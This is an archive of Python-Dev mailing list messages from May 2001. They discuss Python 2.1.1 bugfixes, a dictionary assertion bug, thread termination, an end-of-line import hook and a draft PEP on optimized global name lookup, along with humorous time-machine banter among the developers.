______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller at ion-tof.com  Wed May 23 20:57:28 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 23 May 2001 20:57:28 +0200
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>              <020301c0e3ad$bb559790$e000a8c0@thomasnotebook>  <200105231802.f4NI26408784@odiug.digicool.com>
Message-ID: <033901c0e3ba$36aaa870$e000a8c0@thomasnotebook>

Let me try again (and please forgive my
mistakes in the detail).
The usual way (as in demo\metaclasses):

class B_Meta:
    ....

B = B_Meta('B', (), {})

class C(B):
    pass

B is an instance of the (meta)class B_Meta.
C is now another instance of the same (meta)class.
because B.__class__, which is the (meta)class itself,
is called, and returns a new instance.
B_Meta can (and must) implement a lot of behaviour.

In contrast, with my recipe:

def MagicFunction(name, bases, dict):
    ...construct a class on the fly...
    ...create an instance of this class...
    return aninstance_of_a_class

def B_Meta(): pass
B_Meta.__class__ = MagicFunction

class C(B):
    pass

Now C is an_instance_of_a_class (which is an instance
of a normal python class), and thus does inherit the
normal behaviour of Python classes.

Thomas

PS: I'm sure this all will be much better in descr-branch.
I've checked it out and am playing with it from time
to time, but most of the time I have to use released
Python versions.


From tim.one at home.com  Wed May 23 21:32:59 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 15:32:59 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <20010523160025.B690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>

[Thomas Wouters]
>
> As those of you on python-checkins might have noticed ;) I started
> checking in Python 2.1.1 bufixes.

And bless you for it, Thomas!

> I'd hoped to finish all of my backlog today, but unfortuantely I'm
> now called away on a suprise emergency meeting,

Now that sucks.  Tell your manager that you'll only attend planned emergency
meetings from now on:  Guido plans Python crises years in advance, and it
shows in the relative cleanliness of the Python codebase <wink>.


From nas at python.ca  Wed May 23 21:41:14 2001
From: nas at python.ca (Neil Schemenauer)
Date: Wed, 23 May 2001 12:41:14 -0700
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>; from tim.one@home.com on Wed, May 23, 2001 at 03:32:59PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
Message-ID: <20010523124114.A4747@glacier.fnational.com>

Tim Peters wrote:
> Guido plans Python crises years in advance, and it shows in the
> relative cleanliness of the Python codebase <wink>.

I don't think Thomas has a time machine.

  Neil


From tim.one at home.com  Wed May 23 21:45:06 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 15:45:06 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010523140845.B092299C83@waltz.rahul.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBJKEAA.tim.one@home.com>

[Aahz]
> Okay, so we all know it isn't possible to kill threads cleanly and
> safely in any kind of cross-platform way.  At the same time, a program
> that has a thread running haywire should be able to kill itself
> completely, so that a monitoring process can restart it.  How hard would
> it be to do only that in a cross-platform way?

Since Python is written in C, and C says nothing about this, you need a
platform expert for each platform covered by "cross" <wink>.

> I'm guessing that for Unix, we'd just send a hard signal (9 or 15).  No
> clue what would need to happen for Windows and Mac.
>
> (This got brought up because I experimented with os._exit() as a
> possible solution, but that GPFs on Win98SE.)

Please open a bug report on that, then, with a tiny test case if possible.
This worked fine on Win98SE for me just now:

import thread, os, time

def task():
    while 1:
        print "x",
        time.sleep(.1)

for i in range(10):
    thread.start_new_thread(task, ())

time.sleep(5)
os._exit(1)

Windows kills all threads spawned by a process when "the main thread" exits.
You don't need to do os._exit(), and sys.exit() is normally a much better
idea (else, e.g., stdio buffers may not get flushed to disk).


From thomas at xs4all.net  Wed May 23 22:27:51 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 23 May 2001 22:27:51 +0200
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <20010523124114.A4747@glacier.fnational.com>; from nas@python.ca on Wed, May 23, 2001 at 12:41:14PM -0700
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com>
Message-ID: <20010523222751.G690@xs4all.nl>

On Wed, May 23, 2001 at 12:41:14PM -0700, Neil Schemenauer wrote:
> Tim Peters wrote:
> > Guido plans Python crises years in advance, and it shows in the
> > relative cleanliness of the Python codebase <wink>.
> 
> I don't think Thomas has a time machine.

*Don't* get me started on that. If only Guido would stop hogging the damned
thing, I could be a 34-year-old millionaire in a 10-room house and 8
girlfriends !

Now-I'm-short-ten-years-nine-million-eight-rooms-and-seven-girlfriends-ly
y'rs,
-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one at home.com  Wed May 23 22:32:04 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 16:32:04 -0400
Subject: [Python-Dev] Assertion failed in dictobject.c
In-Reply-To: <20010523111510.D504D3B8999@snelboot.oratrix.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEBOKEAA.tim.one@home.com>

[Jack Jansen]
> I'm seeing the assert on line 525 in dictobject.c (revision 2.92)
> failing. The debugger tells me that ma_fill and ma_size are both 8.
> ma_used is 2, and interestingly hash is also 8.

You wouldn't happen to have a reproducible test case?  That hash==8 is almost
certainly a red herring -- or a sign of wild stores <wink>.

> Going back to revision 2.90 fixes the problem (or masks it).

Instead of:

	assert(mp->ma_fill < mp->ma_size);

this code used to be:

	if (mp->ma_fill >= mp->ma_size) {
		/* No room for a new key.
		 * This only happens when the dict is empty.
		 * Let dictresize() create a minimal dict.
		 */
		assert(mp->ma_used == 0);
		if (dictresize(mp, 0) != 0)
			return -1;
		assert(mp->ma_fill < mp->ma_size);
	}

so the dict would get resized whenever ma_fill >= ma_size, although the code
only *expected* that to happen when the dict table was NULL.  It was perhaps
happening in other cases too.  The dict is never empty (NULL) after the
patch, so the special case for "empty" got replaced by an assert.

Offhand I don't see how this could be triggering -- although *something*
about the 2.90 logic makes me uneasy!  Ah, mp->ma_fill >= mp->ma_size wasn't
a correct test:  filled slots that aren't used slots don't stop a new key
from being added.  Assuming that's it, 2.90 could do needless calls to
dictresize, but the new version does a bogus assert instead.  So replace the
current version's offending

	assert(mp->ma_fill < mp->ma_size);

with

	assert(mp->ma_used < mp->ma_size);

Let me know whether that solves it.

2.90 may also suffer a bogus

		assert(mp->ma_used == 0);

failure.  It's not easy to provoke any of this, though (requires exactly the
right sequence of mixed inserts and deletes, with hash codes hitting exactly
the right dict slots).


From barry at digicool.com  Wed May 23 22:52:22 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 16:52:22 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
	<LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
	<20010523124114.A4747@glacier.fnational.com>
	<20010523222751.G690@xs4all.nl>
Message-ID: <15116.8966.324136.897953@anthem.wooz.org>

>>>>> "TW" == Thomas Wouters <thomas at xs4all.net> writes:

    TW> *Don't* get me started on that. If only Guido would stop
    TW> hogging the damned thing, I could be a 34-year-old millionaire
    TW> in a 10-room house and 8 girlfriends !

It's really not as easy as all that, though.  When Guido's not around,
I've been known to, er, take The Machine for a spin (sshh!  Do /not/
tell him!).  The first time I did, I didn't realize that the blue
toggle had to be in the down position, and when I stepped out,
everybody was speaking Esperanto, had half their heads shaved, and
were toting around what looked like a cross between a dog and a beach
ball (it drooled incessantly).

Fortunately, The Machine has a reset button (oddly labeled "History
Erase Button" and guarded by a candy-crazed TV announcer-like
automaton who must be coaxed from the button with a marshmallow
s'more).

The second time I used it, I'd forgotten that you must keep your left
hand on the silver sphere while you line up the parallel lines with
the lip-actuated alpha wheel.  Silly me, I'd removed my left hand just
before alignment in order to twist the fluroscopic reflection tube a
quarter rotation out of phase (rule of thumb: never listen to that
automaton when he's licked the last of the chocolate-y goo from his
fingers.  He'll say anything to get another s'more.)

You really don't want to know what that particular world looked like,
but let's just say it involved lots and lots of angry elephants.

So now I leave well enough alone, and I've learned that if you really
want to change the past, just wait for Guido to use it for his own
nefarious purposes, and tape a sign to his back requesting the (very
modest) change to the continuum that you're looking for.

And don't forget to smear the front of that sign with s'more.

-Barry


From tim.one at home.com  Wed May 23 23:02:17 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 17:02:17 -0400
Subject: [Python-Dev] Assertion failed in dictobject.c
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEBOKEAA.tim.one@home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGECAKEAA.tim.one@home.com>

[Jack Jansen]
> I'm seeing the assert on line 525 in dictobject.c (revision 2.92)
> failing. The debugger tells me that ma_fill and ma_size are both 8.
> ma_used is 2, and interestingly hash is also 8.

[Tim]
> You wouldn't happen to have a reproducible test case?

Nevermind; I do:

d = {}
for i in range(5):
    d[i] = i
for i in range(5):
    del d[i]
for i in range(5, 9):  # assert triggers when i == 8
    d[i] = i

The cure is more complicated than I described, though.


From esr at thyrsus.com  Thu May 24 00:39:49 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 18:39:49 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org>
Message-ID: <20010523183949.A19251@thyrsus.com>

Barry A. Warsaw <barry at digicool.com>:
> You really don't want to know what that particular world looked like,
> but let's just say it involved lots and lots of angry elephants.

You've been *there*?  Dang...that's the timeline that scared me into
hanging up my lab coat.  It was a slow Saturday and I was hatching
Sinister Plan For World Domination number 4.

What happened to the other three?  Well...I had been planning to
terrorize the western U.S with a giant mechanical spider, until some
guys from Hollywood offered me way too much money for it.  The trained
army of radioactive gorillas I spent the movie money on didn't work
out -- my Igor flatly refused to shovel any more radioactive gorilla
poop, and you know how hard it is to get good help these days.
Blackmailing major cities with a Zeppelin-mounted death ray projector
sounded cool but Radio Shack was out of the parts.

OK, so plan #4 was to create voracious mega-amoebas using my Ionic
Mutatron and send them out to destroy all my enemies, especially that
kid who beat me up in third grade.  There I was, cackling insanely,
just about to unleash these slimy horrors on an unsuspecting world to
wreak havoc and destruction, when the eka-rhodium electrodes on the
Mutatron arced over.  This produced a wild spike of temporokinetic
energy, and guess where *I* was standing?  Silly me.

Before you could say "plot complication" I was materializing in the
Hyraxeum -- damn near nose-to-trunk with the High Pachyderm himself,
as it turned out, who was getting wound up to try out his newest
human-goad on a mahout they had just captured from the Fortified
Cities.  The mahout was terrified out of his wits, and you would have
been too if you'd seen what the High Pachyderm's tusks were covered
with and the lascivious way his trunk was curled around that cheese
grater.  Euggghhh...

It was crazy.  The High Pachyderm was trumpeting like mad, tuskers
charging at me from all directions, and me with at least 5.23 seconds
to go until the temporokinetic charge wore off.  Fortunately I
remembered that elephants communicate using modulated infrasonics that
they hear with the flat part of their foreheads, and I had my trusty
sonic screwdriver on me.  I set it to "infra" at maximum volume and
hurled it at the High Pachyderm -- hit the bugger right in the tiara.
He went berserk and his confused guards started crashing into each
other left and right, which was a pretty impressive sight since the
smallest of them weighed over two and a half tons.
 
It was touch and go there, let me tell you.  I caught one glimpse of
the mahout's rapidly-retreating heels just as the charge wore off and
I was slingshotted back to my lab.  My sonic screwdriver, of course,
followed within seconds -- horribly crushed and mangled.

And that's when I swore off building fiendish devices.  Electrocution
I can laugh at, having my monstrous creations turn on me is all in a
day's work, and that one time I was accidentally transformed into a
fly I found some truly remarkable uses for a three-foot-long
prehensile tongue.  But what the High Pachyderm had planned was too
twisted even for *me*.

I decided Sinister Plan #5 would have to be a bit less hardware-intensive,
if only as a rest for my frazzled nerves.  So I spent the last juice in
the batteries on the orbital mind-control lasers (long story) to implant
some subtle suggestions in a few minds at Netscape and IBM and elsewhere,
and started hitting the conference circuit pretty heavy.

What suggestions?  Oh, nothing important.  Nothing at all...BWAHAHAHAHA!!!
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Sometimes the law defends plunder and participates in it. Sometimes
the law places the whole apparatus of judges, police, prisons and
gendarmes at the service of the plunderers, and treats the victim --
when he defends himself -- as a criminal.
	-- Frederic Bastiat, "The Law"


From gward at python.net  Thu May 24 01:48:10 2001
From: gward at python.net (Greg Ward)
Date: Wed, 23 May 2001 19:48:10 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org>
Message-ID: <20010523194810.A9947@gerg.ca>

On 23 May 2001, Barry A. Warsaw said:
> The second time I used it, I'd forgotten that you must keep your left
> hand on the silver sphere while you line up the parallel lines with
> the lip-actuated alpha wheel.

What?  You mean Guido's time machine was really designed by Larry Wall?
Oh, the irony...

        Greg
-- 
Greg Ward - Python bigot                                gward at python.net
http://starship.python.net/~gward/
If you can read this, thank a programmer.


From dgoodger at bigfoot.com  Thu May 24 03:04:46 2001
From: dgoodger at bigfoot.com (David Goodger)
Date: Wed, 23 May 2001 21:04:46 -0400
Subject: [Python-Dev] Re: Import hook to do end-of-line conversion?
In-Reply-To: <3B0AF45D.732126E6@home.net>
Message-ID: <B731D420.11CB9%dgoodger@bigfoot.com>

Yesterday I found I had need for an end-of-line conversion import hook. I
looked sround but found none (did I miss some code on this thread?), so I
whipped one up (below). It seems to do the job. If you see any goofs, gaffes
or gotchas, or if you know of a better way to do this, please let me know. I
will post this code to c.l.py in a few days for the enjoyment of all.

-- 
David Goodger    dgoodger at bigfoot.com    Open-source projects:
 - The Go Tools Project: http://gotools.sourceforge.net
 - reStructuredText: http://structuredtext.sourceforge.net (soon!)

-----%<----------cut----------%<----------%<----------cut----------%<-----

# Import hook for end-of-line conversion,
# by David Goodger (dgoodger at bigfoot.com).

# Put in your sitecustomize.py, anywhere on sys.path, and you'll be able to
# import Python modules with any of Unix, Mac, or Windows line endings.

import ihooks, imp, py_compile

class MyHooks(ihooks.Hooks):

    def load_source(self, name, filename, file=None):
        """Compile source files with any line ending."""
        if file:
            file.close()
        py_compile.compile(filename)    # line ending conversion is in here
        cfile = open(filename + (__debug__ and 'c' or 'o'), 'rb')
        try:
            return self.load_compiled(name, filename, cfile)
        finally:
            cfile.close()

class MyModuleLoader(ihooks.ModuleLoader):

    def load_module(self, name, stuff):
        """Special-case package directory imports."""
        file, filename, (suff, mode, type) = stuff
        path = None
        if type == imp.PKG_DIRECTORY:
            stuff = self.find_module_in_dir("__init__", filename, 0)
            file = stuff[0]             # package/__init__.py
            path = [filename]
        try:                            # let superclass handle the rest
            module = ihooks.ModuleLoader.load_module(self, name, stuff)
        finally:
            if file:
                file.close()
        if path:
            module.__path__ = path      # necessary for pkg.module imports
        return module

ihooks.ModuleImporter(MyModuleLoader(MyHooks())).install()


From jeremy at alum.mit.edu  Thu May 24 03:10:55 2001
From: jeremy at alum.mit.edu (Jeremy Hylton)
Date: Wed, 23 May 2001 21:10:55 -0400 (EDT)
Subject: [Python-Dev] pre-PEP on optimized global names
Message-ID: <200105240110.VAA09078@newman.concentric.net>

I've been hoping to work on optimized global and builtin name support
for Python 2.2.  I'm not sure if I'll have time, but thought I'd
circulate a draft with some notes on the subject now.  Anyone
interested in this work?

Jeremy

PEP: ???
Title: Optimized Access to Module and Builtin Names
Author: jeremy at digicool.com (Jeremy Hylton)
Status: Draft
Type: Standards Track
Python-Version: 2.2
Created: 23-May-2001

Abstract

    This PEP proposes a new implementation of global module namespaces
    and the builtin namespace that speeds name resolution.  The
    implementation would use an array of object pointers for most
    operations in these namespaces.  The compiler would assign indices
    for global variables at compile time.

    The current implementation represents these namespaces as
    dictionaries.  A global name incurs a dictionary lookup each time
    it is used; a builtin name incurs two dictionary lookups, a failed
    lookup in the global namespace and a second lookup in the builtin
    namespace. 

    This implementation should speed Python code that uses
    module-level functions and variables.  It should also eliminate
    awkward coding styles that have evolved to speed access to these
    names.

    The implementation is complicated because the global and builtin
    namespaces can be modified dynamically in ways that are impossible
    for the compiler to detect.  (Example: A module's namespace is
    modified by a script after the module is imported.)  As a result,
    the implementation must maintain several auxillary data structures
    to preserve these dynamic features.

Introduction

    [expand on the basic ideas in the abstract]

    [describe the key parts of the design: dlict, compiler support,
    stupid name trick workarounds, optimization of other module's
    globals] 

DLict design

    The namespaces are implemented using a data structure that has
    sometimes gone under the name dlict.  It is a dictionary that has
    numbered slots for some dictionary entries.  The type must be
    implemented in C to achieve acceptable performance.  A Python
    implementation is included here to explain the basic design:

"""A dictionary-list hybrid"""

import types

class DLict:
    def __init__(self, names):
        assert isinstance(names, types.DictType)
        self.names = {}
        self.list = [None] * size
        self.empty = [1] * size
        self.dict = {}
        self.size = 0

    def __getitem__(self, name):
        i = self.names.get(name)
        if i is None:
            return self.dict[name]
        if self.empty[i] is not None:
            raise KeyError, name
        return self.list[i]

    def __setitem__(self, name, val):
        i = self.names.get(name)
        if i is None:
            self.dict[name] = val
        else:
            self.empty[i] = None
            self.list[i] = val
            self.size += 1

    def __delitem__(self, name):
        i = self.names.get(name)
        if i is None:
            del self.dict[name]
        else:
            if self.empty[i] is not None:
                raise KeyError, name
            self.empty[i] = 1
            self.list[i] = None
            self.size -= 1

    def keys(self):
        if self.dict:
            return self.names.keys() + self.dict.keys()
        else:
            return self.names.keys()

    def values(self):
        if self.dict:
            return self.names.values() + self.dict.values()
        else:
            return self.names.values()

    def items(self):
        if self.dict:
            return self.names.items()
        else:
            return self.names.items() + self.dict.items()

    def __len__(self):
        return self.size + len(self.dict)

    def __cmp__(self, dlict):
        c = cmp(self.names, dlict.names)
        if c != 0:
            return c
        c = cmp(self.size, dlict.size)
        if c != 0:
            return c
        for i in range(len(self.names)):
            c = cmp(self.empty[i], dlict.empty[i])
            if c != 0:
                return c
            if self.empty[i] is None:
                c = cmp(self.list[i], dlict.empty[i])
                if c != 0:
                    return c
        return cmp(self.dict, dlict.dict)
    
    def clear(self):
        self.dict.clear()
        for i in range(len(self.names)):
            if self.empty[i] is None:
                self.empty[i] = 1
                self.list[i] = None

    def update(self):
        pass

    def load(self, index):
        """dlict-special method to support indexed access"""
        if self.empty[index] is None:
            return self.list[index]
        else:
            raise KeyError, index # XXX might want reverse mapping

    def store(self, index, val):
        """dlict-special method to support indexed access"""
        self.empty[index] = None
        self.list[index] = val

    def delete(self, index):
        """dlict-special method to support indexed access"""
        self.empty[index] = 1
        self.list[index] = None


Compiler issues

    The compiler currently collects the names of all global variables
    in a module.  These are names bound at the module level or bound
    in a class or function body that declares them to be global.

    The compiler would assign indices for each global name and add the
    names and indices of the globals to the module's code object.
    Each code object would then be bound irrevocably to the module it
    was defined in.  (Not sure if there are some subtle problems with
    this.)

Enhancement: Optimized access to other module's globals

    If one module imports another and binds a name in the global
    namespace, the compiler currently detects that the particular
    global is bound to a module.  The compiler also note access to any
    attribute of a module, and emit special opcodes for accessing
    these names.

    At runtime the implementation can lookup the index of the module
    attribute in the module's namespace.  In the current namespace,
    a pointer to the foreign module's dlict can be recorded along with
    the name's offset in the dlict.  This would allow names,
    e.g. types.StringType, to be used with the same efficiency as
    globals. 

Backwards compatibility

    The dlict will need to maintain metainformation about whether a
    slot is currently used or not.  It will also need to maintain a
    pointer to the builtin namespace.  When a name is not currently
    used in the global namespace, the lookup will have to fail over to
    the builtin namespace.

    In the reverse case, each module may need a special accessor
    function for the builtin namespace that checks to see if a global
    shadowing the builtin has been added dynamically.  This check
    would only occur if there was a dynamic change to the module's
    dlict, i.e. when a name is bound that wasn't discovered at
    compile-time. 

    These mechanisms would have little if any cost for the common case
    whether a module's global namespace is not modified in strange
    ways at runtime.  They would add overhead for modules that did
    unusual things with global names, but this is an uncommon practice
    and probably one worth discouraging.

    It may be desirable to disable dynamic additions to the global
    namespace in some future version of Python.  If so, the new
    implementation could provide warnings.
    

Local Variables:
mode: indented-text
indent-tabs-mode: nil
End:


From barry at digicool.com  Thu May 24 04:46:30 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 22:46:30 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
	<LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
	<20010523124114.A4747@glacier.fnational.com>
	<20010523222751.G690@xs4all.nl>
	<15116.8966.324136.897953@anthem.wooz.org>
	<20010523183949.A19251@thyrsus.com>
Message-ID: <15116.30214.900667.624573@anthem.wooz.org>

>>>>> "ESR" == Eric S Raymond <esr at thyrsus.com> writes:

    ESR> Before you could say "plot complication" I was materializing
    ESR> in the Hyraxeum -- damn near nose-to-trunk with the High
    ESR> Pachyderm himself, as it turned out, who was getting wound up
    ESR> to try out his newest human-goad on a mahout they had just
    ESR> captured from the Fortified Cities.

That big self-important elephant wasn't named Puffy the Frog by any
chance, was he?  Did he taste vaguely lemony?  If so, he's got a lot
of nerve calling himself the "High Pachyderm"!  Quite a lofty title
for one who's skin is stretched to just this side of its tensile
breaking point.

Sure, I know ol' Puffy, had a few binges with the old goat myself.
You just don't want to be near him when the stray micro-meteor happens
to pierce his dermis.  Much, MUCH messier than eight crates of cornbob
filled to the brim with radioactive gorilla poop, I can assure you!

now-where'd-i-leave-my-medication?-ly y'rs,
-Barry


From esr at thyrsus.com  Thu May 24 05:04:58 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 23:04:58 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.30214.900667.624573@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 10:46:30PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org>
Message-ID: <20010523230458.A28895@thyrsus.com>

Barry A. Warsaw <barry at digicool.com>:
> That big self-important elephant wasn't named Puffy the Frog by any
> chance, was he?  Did he taste vaguely lemony?  If so, he's got a lot
> of nerve calling himself the "High Pachyderm"!  Quite a lofty title
> for one who's skin is stretched to just this side of its tensile
> breaking point.

Congratulations, Barry.  I googled for "Puffy the Frog" and found a
page that...explained...this.  It was the #1 hit.

Apparently the Universe is an even more random place than I thought. 
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

If I were to select a jack-booted group of fascists who are 
perhaps as large a danger to American society as I could pick today,
I would pick BATF [the Bureau of Alcohol, Tobacco, and Firearms].
        -- U.S. Representative John Dingell, 1980


From barry at digicool.com  Thu May 24 05:14:07 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 23:14:07 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
	<LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
	<20010523124114.A4747@glacier.fnational.com>
	<20010523222751.G690@xs4all.nl>
	<15116.8966.324136.897953@anthem.wooz.org>
	<20010523183949.A19251@thyrsus.com>
	<15116.30214.900667.624573@anthem.wooz.org>
	<20010523230458.A28895@thyrsus.com>
Message-ID: <15116.31871.122265.883855@anthem.wooz.org>

>>>>> "ESR" == Eric S Raymond <esr at thyrsus.com> writes:

    ESR> Congratulations, Barry.  I googled for "Puffy the Frog" and
    ESR> found a page that...explained...this.  It was the #1 hit.

Yes!  In 1965.  My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass
singer in the Atlanta-based band "The Shrinking of George".  What you
found is no doubt the lyrics to that song, which topped the pop charts
briefly in 1965 (August 1st, 1965, 11:57 - 13:01 to be exact),
displacing the Beatles "I Wanna Hold Your Head" before being itself
displaced by the The Bee Gee's "Booger Feever" [sic].  Sadly, even
Napster doesn't have the mp3's and all Dad's old records are scratched
beyond hope.

    ESR> Apparently the Universe is an even more random place than I
    ESR> thought.

here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs,
-Barry


From esr at thyrsus.com  Thu May 24 05:31:42 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 23:31:42 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 11:14:07PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> <15116.31871.122265.883855@anthem.wooz.org>
Message-ID: <20010523233142.A29023@thyrsus.com>

Barry A. Warsaw <barry at digicool.com>:
> Yes!  In 1965.  My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass
> singer in the Atlanta-based band "The Shrinking of George". 

I suppose it's not a coincidence that it's Fernando Poo day today.
Of course it's not a coincidence.  There are no coincidences anywhere.
Fnord.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Sometimes it is said that man cannot be trusted with the government
of himself.  Can he, then, be trusted with the government of others?
	-- Thomas Jefferson, in his 1801 inaugural address


From aahz at rahul.net  Thu May 24 06:59:37 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Wed, 23 May 2001 21:59:37 -0700 (PDT)
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEBJKEAA.tim.one@home.com> from "Tim Peters" at May 23, 2001 03:45:06 PM
Message-ID: <20010524045938.5228199C83@waltz.rahul.net>

Tim Peters wrote:
> [Aahz]
>>
>> (This got brought up because I experimented with os._exit() as a
>> possible solution, but that GPFs on Win98SE.)
> 
> Please open a bug report on that, then, with a tiny test case if possible.
> This worked fine on Win98SE for me just now:

Futz.  *Now* it works.  <sigh>  Chalk it up to another unreproducible
bug caused by an unstable Win98.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From gstein at lyra.org  Thu May 24 10:33:49 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 01:33:49 -0700
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.81,2.82
In-Reply-To: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>; from gvanrossum@users.sourceforge.net on Mon, May 14, 2001 at 07:14:46PM -0700
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010524013349.Y5402@lyra.org>

On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote:
> Update of /cvsroot/python/python/dist/src/Modules
> In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules
> 
> Modified Files:
> 	stropmodule.c 
> Log Message:
> Add warnings to the strop module, for to those functions that really
> *are* obsolete; three variables and the maketrans() function are not
> (yet) obsolete.
> 
> Add a compensating warnings.filterwarnings() call to test_strop.py.
> 
> Add this to the NEWS.

Something that I ran into the other day...

>>> ob = some_object_implementing_the_buffer_interface
>>> string.find(ob, '.')
(fails because ob does not define the .find method)
>>> strop.find(ob, '.')
(succeeds)


The point is that strop uses the t# to get a ptr/len pair to do its work.
Thus, it can work on many things that export the buffer interface. Dropping
strop means we no longer have many of those functions. Instead, the
functionality must be copied to *every* object that implements the buffer
interface.

We can say ob.find() now, but we can't say find(ob) any longer. And saying
that all objects (which implement the buffer API) must now implement a bunch
of "standard" methods is awfully burdensome.

In my particular case, I was trying to do a find on a BufferObject referring
to a subset of another object. Blam. No good. Thankfully, when I did a
find() on a mmap object, it worked simply because mmaps happen to define a
.find method.

[ of course, the find method on an mmap was totally broken, but I checked in
  a fix for that (last week or so) ]


So... my question is: is there any way that we can retain a generic find()
(and similar functions from the string/strop module) that operates on any
type that implements the buffer API?

Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
implements some standard methods for 8-bit character data (using the buffer
API), which can be mixed into new Python types" That would reduce the burden
for new types.

Thoughts?

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein at lyra.org  Thu May 24 10:52:58 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 01:52:58 -0700
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>; from guido@digicool.com on Thu, May 17, 2001 at 02:18:27PM -0400
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <20010524015258.Z5402@lyra.org>

On Thu, May 17, 2001 at 02:18:27PM -0400, Guido van Rossum wrote:
> What's out IPv6 story?  I recall that someone once sent me patches,
